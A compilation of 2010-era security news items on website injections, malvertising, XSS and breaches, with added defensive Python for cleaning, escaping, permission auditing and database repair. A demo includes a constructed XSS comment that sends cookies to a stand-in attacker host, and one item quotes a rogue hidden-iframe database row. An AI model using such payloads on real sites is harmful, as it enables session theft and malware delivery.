Security researchers are warning about a new mass injection attack affecting websites hosted at Rackspace and Media Temple. The compromises result in rogue JavaScript code being added to legitimate .js files used by the affected websites.
The new attack was reported by Denis Sinegubko, the creator of the Unmask Parasites website scanner. “Right before this week-end I noticed an increased number of sites hosted on MediaTemple and RackSpace coming to Unmask Parasites with the same problem — their sites are blocked by Google and their diagnostic pages mention the following five domains: ‘myads .name’, ‘adsnet .biz’, ‘toolbarcom .org’, ‘mybar .us’, ‘freead .name’,” the Web security expert notes.
What is rather unusual about this attack is that the malicious code is not necessarily inserted into the .html files or .php scripts; in fact, this is hardly ever the case. Instead, the attackers add the rogue code to static .js files that already exist on the server.
Another noteworthy aspect of these injections is that the malicious JavaScript snippet is not added on a new line in the tainted files. It is actually prepended to the first line of the document, which makes automatic removal a bit harder, since deleting the entire line would also delete legitimate code. According to Sinegubko, automatic cleaning scripts should strip only the prefix ending in “this.O=58441;var gr0=0;” and leave everything after that string intact.
The rogue JavaScript first checks whether the visitor is a search engine crawler or a real user; the malicious payload is not served to search engine bots. Real visitors are also targeted only once, after which a cookie is set in their browser to prevent them from being attacked again. There is obviously no point in trying to re-infect a user who has already been infected, or on whose computer the exploit failed.
The attackers serve the payload from multiple websites, most likely for redundancy and to make filtering harder. The rogue code will calculate a URL and load the malicious content from it. Sinegubko explains that there are 5 domains and 36 subdomain variations on each. That means 180 possible malicious URLs.
Websites hosted at both companies have been targeted in mass injection attacks before. However, their security staff have not found any particular vulnerability being exploited, or any security hole in their own infrastructure. The Unmask Parasites creator suggests that this might be related to overly generous file permissions, and recommends changing the permissions of static content files such as .js, which are hardly ever modified, to 444 or even 400 if the Web app does not need to change them either.
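The two practical points above, removing only the prepended prefix rather than the whole first line and then locking static files to 444, are shown in the following added example. It is not code from the article or from Unmask Parasites; the marker string is the one quoted by Sinegubko, while the sample .js contents and the placeholder rogue prefix are constructed for the demo.

```python
import os
import stat
import tempfile

# End-of-injection marker reported by Unmask Parasites (from the article).
# Everything before and including it on the first line is the rogue prefix;
# everything after it is the site's own code and must be kept.
MARKER = "this.O=58441;var gr0=0;"

# Constructed stand-in for an injected file: a placeholder prefix ending in
# the marker, glued onto the site's legitimate first line (not real malware).
INJECTED_SAMPLE = (
    "var _p='placeholder-rogue-prefix';" + MARKER
    + "function legit(a, b) { return a + b; }\n"
    "legit(1, 2);\n"
)
CLEAN_SAMPLE = "function legit(a, b) { return a + b; }\nlegit(1, 2);\n"


def is_injected(text: str) -> bool:
    """True when the marker sits on the first line of the file."""
    first_line = text.split("\n", 1)[0]
    return MARKER in first_line


def clean_js(text: str) -> str:
    """Strip the prepended snippet, keeping the rest of the first line.

    Deleting the whole first line would also delete legitimate code that
    the injection was glued onto, so only the prefix up to and including
    the marker is removed.
    """
    first_line, sep, rest = text.partition("\n")
    idx = first_line.find(MARKER)
    if idx == -1:
        return text
    return first_line[idx + len(MARKER):] + sep + rest


def clean_tree(root: str, lock_mode: int = 0o444) -> list:
    """Clean every .js file under root and make static files read-only.

    Returns the list of paths that were actually rewritten. Files that were
    already clean are left alone but still locked to lock_mode (0o444, or
    0o400 if nothing but the owner ever needs to read them).
    """
    changed = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(".js"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", encoding="utf-8", errors="surrogateescape") as fh:
                text = fh.read()
            if is_injected(text):
                # A previously locked file is not writable; re-enable the
                # owner write bit just long enough to rewrite it.
                mode = stat.S_IMODE(os.stat(path).st_mode)
                os.chmod(path, mode | stat.S_IWUSR)
                with open(path, "w", encoding="utf-8", errors="surrogateescape") as fh:
                    fh.write(clean_js(text))
                changed.append(path)
            os.chmod(path, lock_mode)
    return changed


def demo() -> dict:
    """Run the cleaner on a throwaway directory and report what happened."""
    with tempfile.TemporaryDirectory() as tmp:
        bad = os.path.join(tmp, "js", "app.js")
        good = os.path.join(tmp, "js", "vendor.js")
        os.makedirs(os.path.dirname(bad))
        with open(bad, "w") as fh:
            fh.write(INJECTED_SAMPLE)
        with open(good, "w") as fh:
            fh.write(CLEAN_SAMPLE)
        changed = clean_tree(tmp)
        with open(bad) as fh:
            after = fh.read()
        return {
            "changed": [os.path.relpath(p, tmp).replace(os.sep, "/") for p in changed],
            "cleaned_text": after,
            "bad_mode": stat.S_IMODE(os.stat(bad).st_mode),
            "good_mode": stat.S_IMODE(os.stat(good).st_mode),
        }


if __name__ == "__main__":
    print(demo())
```

Run it against a copy of the web root first and diff the result; a marker that changes in a later wave of the campaign would leave files untouched rather than damaged, which is the point of matching the prefix instead of the line.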
Credit: Softpedia.com News
A malvertising attack targeted TweetMeme.com users today after a rogue advertiser made its way onto the website. The malicious advertisements directed users to third-party websites displaying fake malware alerts, with the purpose of convincing users to install scareware.
Malvertising (malicious advertising) is a type of attack where cyber crooks manage to insert rogue ads that lead users to malicious content into a legit website. The practice is commonly employed by scareware pushers to distribute their fake antivirus products.
According to StopMalvertising, a website dedicated to researching and stopping such attacks, TweetMeme users were targeted via malicious advertisements served by a rogue advertiser at y5-media.com. An investigation of the incident revealed that the threat distributed through these malvertisements was a fake antivirus called Security Threat Analysis.
The researchers explain that requests to y5-media.com bounce through two other websites before landing on the scareware domains. In order to fly under the radar, the cyber crooks tried to make the attack as subtle as possible.
“Both domains perform various checks to see whether you’re a bot, a search engine, a proxy … as in those cases the redirect to the scareware will not happen,” the researchers explain. Also, if a user visits the malicious websites once, a cookie is added in his browser to prevent him from being targeted again.
The landing websites at www3.luckfind42td.in and www2.guardhere5.in display the typical fake malware scans associated with scareware scams. When these scans are “done”, users are taken to another domain, www1.wareforyou10.in, which serves a file called packupdate107_302.exe for download. This is a program from the FakeAV family of malware, which currently has a very low AV detection rate.
Malvertisements can be very dangerous because, unlike black hat search engine optimization campaigns that poison search results with malicious links, they are a lot harder to detect and they abuse the trust that users place in legitimate websites. Popular websites previously affected by similar attacks include the New York Times, Gizmodo and Digital Spy.
Credit: Softpedia.com News
The Pirate Bay has been compromised by an Argentinian hacker who made off with the usernames, email addresses and IP addresses of more than four million people signed up to the BitTorrent tracker site.
KrebsOnSecurity.com reported yesterday that Ch Russo broke into TPB’s system and grabbed the information from the notorious website, something that might amuse some pro-copyright groups.
Russo had considered selling the private data, but in the end decided to go public about TPB’s shaky security credentials. He accessed the information in the site’s user database by exploiting an SQL injection vulnerability.
“We wanted to tell people that their information may not be so well protected,” Russo said.
Meanwhile, it may be a coincidence, but The Pirate Bay is currently out of action and carried the following message:
“Upgrading some stuff, database is in use for backups, soon back again.. Btw, it’s nice weather outside I think.”
At this moment the website appears to be offline.
Credit: The Register
Hackers and pranksters began exploiting a newly discovered scripting flaw on YouTube on Sunday, provoking rumours that a virus was spreading on the site.
The cross-site scripting (XSS) flaw on the video-sharing website created a means for hackers to post JavaScript code in the comments sections of videos. The flaw meant that this JavaScript code ran in the browsers of surfers viewing the same video clip.
Predictably enough, pranksters at 4chan have begun using the vulnerability to redirect surfers looking for Justin Bieber video clips to goatse or to false reports that the irksomely clean-cut Canadian singer had died in a car crash. Denizens of 4chan are separately trying to rig an online poll to encourage Bieber to play North Korea on an upcoming tour.
In other cases the flaw has become the fodder of comment spam. Google iced the problem hours after it first appeared, techie-buzz.com reports.
“We took swift action to fix a cross-site scripting (XSS) vulnerability on youtube.com that was discovered several hours ago,” said Google. “Comments were temporarily hidden by default within an hour, and we released a complete fix for the issue in about two hours. We’re continuing to study the vulnerability to help prevent similar issues in the future.”
The appearance of the vulnerability sparked rumours on Twitter and elsewhere that a virus was spreading across YouTube. A blog post by Chris Boyd of Sunbelt charts the genesis of this rumour, which is just the sort of thing that is likely to be used in new fake anti-virus (scareware) scams.
Security watchers at the Internet Storm Centre note that the vulnerability on YouTube might potentially have been used for all manner of hacking attacks, including password stealing scams.
“They [hackers] could steal your YouTube cookies, which probably doesn’t mean much to them, but they could also post various JavaScript code that will execute in your browser, in the context of YouTube,” an ISC handler writes. “I’ve seen nasty XSS attacks that are used to fake whole login screens and we know how many people use [the] same passwords for multiple accounts.”
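The mechanism behind the YouTube flaw and the ISC handler's cookie-theft remark can be shown with a small added example in Python. It is not YouTube's code and not from the article: a comment renderer that concatenates user input raw beside one that HTML-encodes it, plus a session cookie flagged HttpOnly as the defence-in-depth layer against document.cookie reads. The comments and the attacker.invalid host are constructed for the demo.

```python
import html

# Constructed comment, standing in for what pranksters posted: script that
# would run in every viewer's browser in the site's origin if inserted raw.
HOSTILE_COMMENT = (
    "Nice video! <script>new Image().src='http://attacker.invalid/?c='"
    "+encodeURIComponent(document.cookie)</script>"
)
BENIGN_COMMENT = "Loved it, 5 < 10 stars & more"


def render_comment_unsafe(author: str, body: str) -> str:
    """The bug: user input concatenated straight into the page markup."""
    return '<li class="comment"><b>%s</b>: %s</li>' % (author, body)


def render_comment(author: str, body: str) -> str:
    """Encode for the HTML text context before insertion.

    html.escape turns <, >, &, " and ' into entities, so a posted <script>
    tag is displayed as text instead of being parsed as markup.
    """
    return '<li class="comment"><b>%s</b>: %s</li>' % (
        html.escape(author, quote=True),
        html.escape(body, quote=True),
    )


def render_thread(comments, safe=True) -> str:
    """Render a list of (author, body) pairs with either renderer."""
    render = render_comment if safe else render_comment_unsafe
    items = "".join(render(a, b) for a, b in comments)
    return "<ul>%s</ul>" % items


def contains_script_tag(page: str) -> bool:
    """Crude check used by the demo: does raw <script markup survive?"""
    return "<script" in page.lower()


def session_cookie_header(value: str) -> str:
    """Defence in depth: a session cookie flagged HttpOnly cannot be read
    through document.cookie, so the payload above would exfiltrate nothing.
    It does not stop script from acting in the page, e.g. drawing a fake
    login form, which is why output encoding remains the real fix."""
    return "Set-Cookie: session=%s; Path=/; Secure; HttpOnly" % value


if __name__ == "__main__":
    thread = [("alice", BENIGN_COMMENT), ("prankster", HOSTILE_COMMENT)]
    print(render_thread(thread, safe=False))
    print(render_thread(thread, safe=True))
    print(session_cookie_header("opaque-session-id"))
```

Note that html.escape is correct only for the text and quoted-attribute contexts; input placed inside a URL, inline event handler or script block needs that context's own encoding.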
Credit: The Register
Banks in Russia and Ukraine are under continued siege by criminal gangs wielding a sophisticated, next-generation exploitation kit that hacks the financial institutions’ authentication system and then hits it with a denial-of-service attack.
The attacks are being carried out with the help of a top-to-bottom revision of BlackEnergy, a popular hack-by-numbers toolkit that until recently was used primarily to launch DDoS, or distributed denial-of-service, attacks. Eastern European criminal gangs are using the expanded capabilities of BlackEnergy 2 to siphon funds out of electronic bank accounts and then assault the financial institutions with more data than they can handle, said Joe Stewart, a researcher with security firm SecureWorks’ Counter Threat Unit.
The attacks, which also use a BlackEnergy 2 module to bypass a Java-based application the banks use to authenticate customers online, began near the end of 2009. They show no signs of letting up, said Stewart, who observed the same modus operandi earlier this week.
“Over the months that I’ve been monitoring this botnet, it’s attacked probably a dozen or more banks with the same type of pattern of attacking the java authentication app,” Stewart told The Register. “All we see is, yes, this group has the plug-in that does the banking theft and then we see them also hacking that same banking authentication with the DDoS attack.”
BlackEnergy came to prominence in 2008 when it was reportedly used to disrupt internet communications in Georgia during the armed conflict between the former Soviet republic and Russia. It quickly became a major staple among Eastern European thugs, selling online for about $40 until free, pirated copies became widely available.
BlackEnergy 2, which Stewart first began monitoring in 2009, greatly expands what the software can do. It brings modular functionality to the tool, so separate programmers can write plug-in programs in much the way developers do for the Firefox browser. The gangs Stewart is monitoring are combining BlackEnergy’s core DDoS functionality with an add-on to hack the Java authentication application, said Stewart, who presented his findings at this week’s FIRST (Forum of Incident Response and Security Teams) conference in Miami.
“It’s a good technique to keep [bank employees] distracted while they get the money moved out,” Stewart said. It also “keeps people whose money is in transfer from logging on and seeing what’s happening.”
Bank customers victimized in the attacks are being targeted by trojans disguised as pay-per-install applications.
In a major break from previous methods, the gangs are exclusively attacking banks in Russia and Ukraine. Previously, they went out of their way to avoid attacking banks in the region, presumably out of fear of attracting attention of law enforcement agents in the criminals’ own backyard. Stewart said he’s seen at least two unrelated bank fraud scams exclusively targeting banks in Russia and Ukraine, including the Bredavi trojan.
Credit: The Register
A subtle defacement of the website of electronics manufacturer Foxconn has drawn further attention to an alarming spate of worker suicides at a plant in southern China.
Nine of the workers at a Shenzhen plant where iPhones and other hi-tech kit are assembled have killed themselves this year, with a further two unsuccessful suicide attempts. In a satirical response, Foxconn’s human resources site was hacked with a spoof ‘We’re Hiring’ notice.
A translation of the Chinese-language defacement by Shanghaiist reads:
Foxconn — We’re Hiring
Are you feeling down today? Do you feel like not living anymore? Do you want to know what it feels like to jump down from China’s model suicide jumping facility? Foxconn provides you the perfect environment to jump.
All the many reasons to jump here have ensured at least one jump per week.
Comprehensive press coverage guaranteed, to ensure your name travels ten thousand miles.
What are you waiting for? Pick up your phone now and join Foxconn.
Be the kickass twelfth jumper.
You can do it.
Hiring hotline: 514514514
The number “514” that is repeated three times in the “hiring hotline” sounds like the Chinese for “I want to die”, Shanghaiist (via fastcompany.com) adds. The defacement itself was not on the home page of Foxconn’s site.
It’s unclear who tampered with the site, much less how they posted the spoof notice but it’s safe to say that the hack was much more subtle and sophisticated than the great majority of defacements. The site runs IIS 5 on a Windows 2000 platform.
Meanwhile, back in the real world, the head of Foxconn on Tuesday hosted international journalists on a tour of the controversial Shenzhen facility, where 300,000 people live and work, as part of a bid to assuage suspicions that workers at the factory are being ill-treated. Attempts to paint the facility in a favourable light have not been helped by local reports that workers are being asked to sign promises not to kill themselves, or that the firm has placed safety nets around high buildings in order to prevent staff jumping to their deaths, the BBC reports.
Apple, Dell and Hewlett-Packard all said they were investigating working conditions at Foxconn, the Financial Times adds.
Credit: The Register
Carders.cc, a German online forum dedicated to helping criminals trade and sell financial data stolen through hacking, has itself been hacked. The once-guarded contents of its servers are now being traded on public file-sharing networks, leading to the exposure of potentially identifying information on the forum’s users as well as countless passwords and credit card accounts swiped from unsuspecting victims.
The breach involves at least three separate files being traded on Rapidshare.com. The largest is a database file containing what appear to be all of the communications among nearly 5,000 Carders.cc forum members, including the contents of private, one-to-one messages that subscribers to these forums typically use to negotiate the sale of stolen goods. Another file includes the user names, e-mail addresses and, in many cases, the passwords of Carders.cc forum users.
A third file — which includes what appear to be Internet addresses assigned to the various Carders.cc users when those users first signed up as members — also features a breezy explanation of how the forum was compromised. The top portion of this file — which is accompanied by an ASCII art picture of a cat — includes an oblique reference to the party apparently responsible for the Carders.cc site compromise, noting that the file is the inaugural issue of Owned and Exposed, no doubt the first of many such “e-zines” to come from this group.
Ironically, the anonymous authors of the e-zine said they were able to compromise the criminal forum because its operators had been sloppy with security. Specifically, they claimed, the curators of Carders.cc had set insecure filesystem permissions on the Web server, which essentially turned what might have been a minor site break-in into a total database compromise. From the e-zine’s opening salvo:
Many of you guys may have noticed this breeding German “underground” shit called carders.cc. For those who don’t: Carders is a marketplace full of everything that is illegal and bad. Carding, fraud, drugs, weapons and tons of kiddies. They used to be only a small forum, but after we erased 1337-crew they got more power. The rats left the sinking ship. The voices told us to own them since carders is our fault and we had to fix our flaw. So we did.
During the ownage they also gave us lulz by showing off their ridiculous configuration skills which had a specific impact on their security. They actually managed to chmod and chown nearly everything to 777 and www-user readable. Including their /root directory.
On the surface, it’s tempting to grin at the misfortune of these fraudsters. Still, the leaked database contains no small amount of password and banking information for many innocent victims. In addition, these types of vigilante attacks typically come with hidden costs: For one thing, while it may be true that law enforcement officials could use some of this information to locate people engaged in computer trespass, and buying or selling stolen personal and financial data, the public release of this information could just as easily prompt those individuals to abandon those accounts and Internet addresses, and even potentially jeopardize ongoing investigations.
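The configuration failure the e-zine ridicules, everything chmod'ed 777 and owned by the web-server account, is exactly what a permissions audit should catch before an attacker does. The following is an added example, not code from the e-zine, from KrebsOnSecurity or from any real site: it walks a directory tree and reports world-writable entries and, optionally, anything owned by the web-server uid. The sample layout it audits is constructed inside a temporary directory.

```python
import os
import stat
import tempfile


def audit_permissions(root: str, web_uid=None) -> list:
    """Walk root and report risky modes of the kind the e-zine describes.

    Findings are (relative_path, mode_octal, reason) tuples:
      - world-writable (o+w) files or directories, 0777 being the worst case;
      - when web_uid is given, anything owned by the web-server account,
        which lets a compromised web process rewrite it at will.
    """
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if stat.S_ISLNK(st.st_mode):
                continue  # judge link targets where they live, not here
            mode = stat.S_IMODE(st.st_mode)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            if mode & stat.S_IWOTH:
                reason = "0777" if mode == 0o777 else "world-writable"
                findings.append((rel, oct(mode), reason))
            if web_uid is not None and st.st_uid == web_uid:
                findings.append((rel, oct(mode), "owned by web user"))
    return sorted(findings)


def demo() -> list:
    """Build a throwaway tree mimicking the sloppy layout and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        os.makedirs(os.path.join(tmp, "uploads"))
        os.makedirs(os.path.join(tmp, "conf"))
        db_conf = os.path.join(tmp, "conf", "db.php")
        upload = os.path.join(tmp, "uploads", "avatar.png")
        for p in (db_conf, upload):
            with open(p, "w") as fh:
                fh.write("constructed sample\n")
        os.chmod(os.path.join(tmp, "uploads"), 0o777)  # the mistake
        os.chmod(upload, 0o666)                          # also writable by all
        os.chmod(os.path.join(tmp, "conf"), 0o750)      # sane: group read only
        os.chmod(db_conf, 0o640)
        return audit_permissions(tmp)


if __name__ == "__main__":
    for rel, mode, reason in demo():
        print("%-24s %s  %s" % (rel, mode, reason))
```

Pass the uid of the account the web server runs as (for example from pwd.getpwnam("www-data").pw_uid) to get the ownership findings as well; on a real site a configuration directory owned by that account is the finding that turns a web-shell upload into the database dump described above.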
Credit: KrebsOnSecurity.com
Two websites hosted on the telegraph.co.uk domain were defaced yesterday to display Romanian patriotic messages and the country’s flag. The hacktivists who claimed responsibility for the attack expressed anger at the British media for portraying the Romanian people in an unfavorable light.
The attack targeted the wine-and-dine.telegraph.co.uk and shortbreaks.telegraph.co.uk websites and was originally reported on the Romanian Security Team (RST) hacking forum. However, according to the message left behind on the affected websites, the compromise is attributed to a group called Romanian National Security (R.N.S.).
It seems that both of the affected subdomains were being used for Daily Telegraph promotions. “With the Telegraph’s Wine and Dine for only £10 offer enjoy two courses and a glass of Bordeaux for only £10 at more than 600 restaurants and pubs,” reads a Google cached summary for wine-and-dine.telegraph.co.uk. Meanwhile, shortbreaks.telegraph.co.uk seems to correspond to a campaign, which allows readers to “save up to 50% at more than 400 hotels throughout the British isles.”
There is a strong possibility that the Daily Telegraph was targeted as a representative of the entire British media, because the hackers were a lot broader in their accusations. “We’re tired of sitting and watching how ’scum’ like you mock our country. Of the picture you paint of us, and which has nothing to do with reality, by calling us ‘Romanian gypsies’ and by airing [expletive] shows like TopGear. For having the nerve to step on the toes of an entire country, be warned that we will not stop here!,” they wrote [human translation from Romanian], before ending their statement with “Guess what, gypsies aren’t Romanians, morons.”
The TopGear reference concerns the first episode of the series’ 14th season, which follows the TopGear team in its quest to locate and drive along the Romanian Transfagarasan highway, one of the most dramatic paved roads in Europe. Unfortunately, the segment contains some rather unflattering remarks about the Eastern European country and its people.
The irony of this attack is that while the hacktivists condemn ethnic discrimination, that is, treating Romanians differently because of their nationality, they go on to indirectly discriminate against Romani people (gypsies) by suggesting that being a member of that ethnic group is a bad thing.
At the time of writing this article, only the shortbreaks.telegraph.co.uk defacement was still live. A song called The Lonely Shepherd, played by world-renowned Romanian pan flute master Gheorghe Zamfir, loads in the background.
Credit: Softpedia.com News
The Apache Software Foundation (ASF) announces that several of its services were targeted in a complex attack that led to a server being completely hacked and another partially compromised. A considerable number of possibly insecure password hashes have also been lifted from the organization’s systems.
The attack started on April 5 when someone created a fake error report in JIRA, a proprietary project management solution developed by a company called Atlassian and used by the ASF. The rogue entry contained a TinyURL-shortened link, which, if opened, exploited an undisclosed JIRA cross-site scripting (XSS) vulnerability to steal session cookies for logged in users.
“When this issue was opened against the Infrastructure team, several of our administrators clicked on the link. This compromised their sessions, including their JIRA administrator rights,” Philip Gollucci, the foundation’s vice president in charge of infrastructure, explained. He also noted that, at the same time, the JIRA login page was subjected to a brute force password guessing attack.
After obtaining a set of valid administrative credentials for the project management system, the attackers located a writable directory on the server and used it to execute malicious scripts. This allowed them to install a password logging component and capture additional JIRA logins.
“One of these passwords happened to be the same as the password to a local user account on brutus.apache.org, and this local user account had full sudo access. The attackers were thereby able to login to brutus.apache.org, and gain full root access to the machine. This machine hosted the Apache installs of JIRA, Confluence, and Bugzilla,” Mr. Gollucci said.
Furthermore, using cached SVN passwords found on the “rooted” server, the attackers managed to log into several limited shell accounts on minotaur.apache.org. This server, which is also known as people.apache.org, hosts accounts for all Apache developers and was the target of a different attack in August last year. Fortunately, the attackers did not manage to escalate the privileges on this machine as well.
Users of the Apache Foundation’s JIRA, Bugzilla and Confluence (wiki) systems, which all ran on the compromised server, are advised that their passwords could be recovered from the stolen hashes. JIRA users in particular who logged in between April 6 and April 9 should consider their passwords already compromised, as they were captured via the login form.
Apache.org’s infrastructure team has already taken several steps to prevent similar attacks in the future and the response received from the community so far is overwhelmingly positive. The majority of users congratulate the organization for its openness when dealing with incidents such as this one.
Credit: Softpedia.com News
Hundreds of WordPress-powered blog owners have recently found their websites inaccessible after a critical value was altered in the database. The attack seems to affect even the latest version of the popular blog platform and, so far, the entry point has not been determined.
Sucuri Security Labs, a provider of Web-based integrity monitoring, reports that a worrying number of blogs were compromised over the last week in an attempt to silently redirect visitors to a malicious URL loading exploits. According to the company, most of the affected sites are hosted at Network Solutions.
The common symptom of the hack is an altered “siteurl” value in the “wp_options” database table. This option should normally contain the main URL of the website; on affected installations, however, it is replaced with a rogue <iframe> element pointing to http://networkads.net/grep/ [don’t open].
This is how it looks in the database:
(2, 0, 'siteurl', '<iframe style=\"display:none\" height=\"0\" width=\"1\" src=\"http://networkads.net/grep/\"></iframe>', 'yes'),
Since “siteurl” is not supposed to hold HTML code, this modification breaks the entire blog layout and prevents users and admins alike from reaching the website. The unusual technique suggests that the attackers are amateurs and not particularly familiar with the intricacies of the WordPress platform.
Another interesting aspect is that no one has successfully pinpointed the entry point used by the attackers, which could be either an unidentified security hole in WordPress or a common plug-in. “The only way for the database to be modified like that is via SQL injection or a bigger problem inside Network Solutions databases,” David Dede, a security researcher with Sucuri, said, however, no suspicious activity is registered in the access logs.
Shashi Bellamkonda, head of social media strategy at Network Solutions, challenged the idea that only blogs hosted with Network Solutions were affected. “It’s not accurate to say that this affects only Network Solutions customers. It seems like there have been a spate of these attacks over the past few weeks,” he wrote in response to Sucuri’s report.
Fixing the rogue “siteurl” entry in the database might not be enough to mitigate this problem, as a lot of webmasters reported their blogs getting reinfected. It is also recommended to manually override the “siteurl” value via wp-config.php (the WP_SITEURL constant), so that a tampered database row no longer controls it.
To fix this issue, just revert your siteurl back to the previous value. Log in to your control panel, go to manage database, and edit the siteurl value in the wp_options table.
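The detection and the fix described above can be scripted rather than done by hand in a database GUI. The following added example is not Sucuri's or WordPress's code: it models the wp_options table (option_id, blog_id, option_name, option_value, autoload, matching the row quoted above) in an in-memory SQLite database, flags URL options that do not hold a bare URL, and restores a known-good value with a parameterised UPDATE. The good URL http://blog.example is an assumed placeholder for the site's real address; against a live MySQL install the same two statements run unchanged through the usual DB-API connector.

```python
import re
import sqlite3

# The rogue value quoted in the article (entity-free form of the dumped row).
ROGUE_VALUE = (
    '<iframe style="display:none" height="0" width="1" '
    'src="http://networkads.net/grep/"></iframe>'
)
GOOD_URL = "http://blog.example"   # assumed original value for the demo

# A siteurl/home option must be exactly one http(s) URL: no markup, no
# whitespace, nothing appended after it.
URL_RE = re.compile(r"https?://[A-Za-z0-9.\-]+(:\d+)?(/[^\s<>\"']*)?")


def build_demo_db() -> sqlite3.Connection:
    """In-memory stand-in for the MySQL wp_options table (constructed)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE wp_options (option_id INTEGER PRIMARY KEY, blog_id INTEGER, "
        "option_name TEXT, option_value TEXT, autoload TEXT)"
    )
    conn.executemany(
        "INSERT INTO wp_options VALUES (?, ?, ?, ?, ?)",
        [
            (1, 0, "home", GOOD_URL, "yes"),
            (2, 0, "siteurl", ROGUE_VALUE, "yes"),
        ],
    )
    conn.commit()
    return conn


def find_tampered_urls(conn) -> list:
    """Return (option_name, option_value) for URL options that are not URLs.

    Both siteurl and home are checked, since either one being rewritten
    redirects or breaks the site in the same way.
    """
    rows = conn.execute(
        "SELECT option_name, option_value FROM wp_options "
        "WHERE option_name IN ('siteurl', 'home')"
    ).fetchall()
    return [(n, v) for n, v in rows if not URL_RE.fullmatch(v)]


def restore_url(conn, option_name: str, url: str) -> int:
    """Put the known-good URL back using a parameterised UPDATE.

    The value is bound as a parameter, never interpolated into the SQL,
    and is itself validated so the cleanup cannot write more junk.
    """
    if not URL_RE.fullmatch(url):
        raise ValueError("refusing to write a non-URL into %s" % option_name)
    cur = conn.execute(
        "UPDATE wp_options SET option_value = ? WHERE option_name = ?",
        (url, option_name),
    )
    conn.commit()
    return cur.rowcount


def demo() -> dict:
    """Detect the rogue row, repair it, and confirm nothing is left."""
    conn = build_demo_db()
    before = find_tampered_urls(conn)
    fixed = sum(restore_url(conn, name, GOOD_URL) for name, _ in before)
    after = find_tampered_urls(conn)
    return {"before": before, "fixed_rows": fixed, "after": after}


if __name__ == "__main__":
    print(demo())
```

Re-run find_tampered_urls on a schedule: the reinfections reported above mean a one-off fix proves nothing, and a repeated hit after the database password reset is the signal that the entry point is still open.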
Update: It seems that a malicious user employed a script that automatically scoured the Network Solutions system for poorly secured accounts and, when one was found, modified the database so that the corresponding website redirected users to the malicious website. The mass hack caused Network Solutions customers running WordPress to silently redirect visitors to malicious sites. Network Solutions has now closed the hole by resetting the database passwords for the blogging software, the company said on Sunday. Users should also review their settings for any administrative accounts they do not recognize and, if found, delete them.
Credit: Softpedia.com News